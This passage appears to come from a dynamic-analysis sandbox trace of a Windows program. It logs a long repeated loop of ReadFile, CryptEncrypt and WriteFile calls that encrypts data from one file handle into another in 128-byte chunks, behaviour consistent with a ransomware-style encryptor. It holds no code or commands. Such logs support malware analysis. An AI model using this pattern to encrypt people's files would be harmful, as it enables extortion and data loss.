pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.098] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.098] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.098] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.099] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.099] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.099] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.099] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.099] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.099] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.100] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.100] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.100] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.100] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.100] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.101] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.101] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.102] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.102] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.102] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.102] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.102] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.102] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.103] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.103] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.103] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.103] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.103] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.103] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.104] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.104] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.104] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.104] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.104] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.104] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.105] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.105] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.105] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | 